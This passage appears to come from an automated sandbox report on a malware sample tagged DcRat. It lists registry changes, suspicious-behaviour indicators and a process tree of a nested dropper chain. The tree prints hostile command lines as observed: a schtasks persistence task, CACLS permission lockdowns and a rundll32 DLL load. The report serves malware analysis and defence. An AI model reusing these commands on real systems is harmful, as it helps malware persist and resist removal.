Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1684 AppLaunch.exe 1684 AppLaunch.exe 3484 3nN42tm.exe 3484 3nN42tm.exe 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE 3300 Explorer.EXE -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3484 3nN42tm.exe 5544 toolspub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
pid Process 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1684 AppLaunch.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 5628 4891.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 4020 4C4C.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeDebugPrivilege 3484 Conhost.exe Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE Token: SeShutdownPrivilege 3300 Explorer.EXE Token: SeCreatePagefilePrivilege 3300 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 1032 LzmwAqmV.tmp -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe 368 msedge.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3300 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3012 wrote to memory of 2724 3012 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe 89 PID 3012 wrote to memory of 2724 3012 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe 89 PID 3012 wrote to memory of 2724 3012 44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe 89 PID 2724 wrote to memory of 1660 2724 ji2Rk63.exe 91 PID 2724 wrote to memory of 1660 2724 ji2Rk63.exe 91 PID 2724 wrote to memory of 1660 2724 ji2Rk63.exe 91 PID 1660 wrote to memory of 1996 1660 An5dW77.exe 92 PID 1660 wrote to memory of 1996 1660 An5dW77.exe 92 PID 1660 wrote to memory of 1996 1660 An5dW77.exe 92 PID 1996 wrote to memory of 3236 1996 Ec1Qz04.exe 93 PID 1996 wrote to memory of 3236 1996 Ec1Qz04.exe 93 PID 1996 wrote to memory of 3236 1996 Ec1Qz04.exe 93 PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94 PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94 PID 3236 wrote to memory of 2472 3236 hi3HF41.exe 94 PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95 PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95 PID 2472 wrote to memory of 4388 2472 fU6tW83.exe 95 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 4388 wrote to memory of 1684 4388 1ap54Lf4.exe 96 PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97 PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97 PID 2472 wrote to memory of 3296 2472 fU6tW83.exe 97 PID 3296 wrote to memory of 1564 3296 2cN4918.exe 101 PID 3296 wrote to memory of 1564 3296 2cN4918.exe 101 PID 3296 wrote to memory of 1564 3296 2cN4918.exe 101 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3296 wrote to memory of 884 3296 2cN4918.exe 102 PID 3236 wrote to memory of 3484 3236 hi3HF41.exe 103 PID 3236 wrote to memory of 3484 3236 hi3HF41.exe 103 PID 3236 wrote to memory of 3484 3236 hi3HF41.exe 103 PID 1996 wrote to memory of 2784 1996 Ec1Qz04.exe 106 PID 1996 wrote to memory of 2784 1996 Ec1Qz04.exe 106 PID 1996 wrote to memory of 2784 1996 Ec1Qz04.exe 106 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 2784 wrote to memory of 3364 2784 4NF601SA.exe 107 PID 1660 wrote to memory of 4408 1660 An5dW77.exe 108 PID 1660 wrote to memory of 4408 1660 An5dW77.exe 108 PID 1660 wrote to memory of 4408 1660 An5dW77.exe 108 PID 4408 wrote to memory of 2468 4408 5JG7nd9.exe 109 PID 4408 wrote to memory of 2468 4408 5JG7nd9.exe 109 PID 4408 wrote to memory of 2468 4408 5JG7nd9.exe 109 PID 2724 wrote to memory of 4708 2724 ji2Rk63.exe 110 PID 2724 wrote to memory of 4708 2724 ji2Rk63.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3300 -
C:\Users\Admin\AppData\Local\Temp\44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe"C:\Users\Admin\AppData\Local\Temp\44117aa4ffc3de9f9176bbbcfa9445aeb7e735e83b7928d8a6cc57e1eb67f0e1.exe"2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ji2Rk63.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ji2Rk63.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\An5dW77.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\An5dW77.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ec1Qz04.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ec1Qz04.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\hi3HF41.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\hi3HF41.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\fU6tW83.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\fU6tW83.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ap54Lf4.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1ap54Lf4.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cN4918.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2cN4918.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:1564
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 19610⤵
- Program crash
PID:4168
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3nN42tm.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3nN42tm.exe7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4NF601SA.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4NF601SA.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:3364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5JG7nd9.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5JG7nd9.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:2468 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F7⤵
- DcRat
- Creates scheduled task(s)
PID:4760
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit7⤵PID:4780
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵PID:1340
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"8⤵PID:2308
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E8⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵PID:564
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"8⤵PID:3080
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E8⤵PID:2448
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main7⤵
- Loads dropped DLL
PID:264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Md9pf5.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Md9pf5.exe4⤵
- Executes dropped EXE
PID:4708
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exe3⤵
- Executes dropped EXE
PID:2264 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\126A.tmp\126B.tmp\126C.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Rt5OT77.exe"4⤵PID:3632
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login5⤵PID:2152
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d747186⤵PID:1132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,7634152411313414620,14593951686294844859,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:36⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,7634152411313414620,14593951686294844859,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:26⤵PID:3552
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:368 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf1d746f8,0x7ffdf1d74708,0x7ffdf1d747186⤵PID:4036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:36⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:26⤵PID:2536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:86⤵PID:3540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:16⤵PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:16⤵PID:3752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:16⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:16⤵PID:5160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:16⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:16⤵PID:5308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:16⤵PID:6140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:16⤵PID:1172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:86⤵PID:3632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:86⤵PID:5492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:16⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:16⤵PID:1348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,9897252923422389749,3378452451361649956,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5604 /prefetch:86⤵PID:4364
-
-
